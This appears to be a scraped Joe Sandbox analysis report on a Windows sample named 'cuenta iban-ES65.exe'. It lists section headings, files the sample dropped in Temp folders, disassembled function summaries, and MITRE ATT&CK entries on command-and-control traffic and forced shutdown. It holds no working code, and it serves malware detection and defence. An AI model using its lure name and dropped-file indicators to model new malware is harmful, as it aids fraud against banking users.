Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\-49-u729

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82\merrill.txt

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82\mf.fys

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82\unpopularised.fas

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Exceptionalally\Insecure\Thorkilds.Jus

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Exceptionalally\Insecure\heiling.rep

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Nonimporting.Roy

C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsn876E.tmp\nsExec.dll

C:\Windows\hotdoggen.ini

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
cuenta iban-ES65.exe

Function 004030EC Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357
stringcomfileCOMMON

Function 00405063 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405D2E Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Function 004055AE Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159
filestringCOMMON

Function 00403A1E Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345
windowstringCOMMON

Function 0040368C Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00404F24 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 00404F25 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 004053EB Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Function 00406037 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre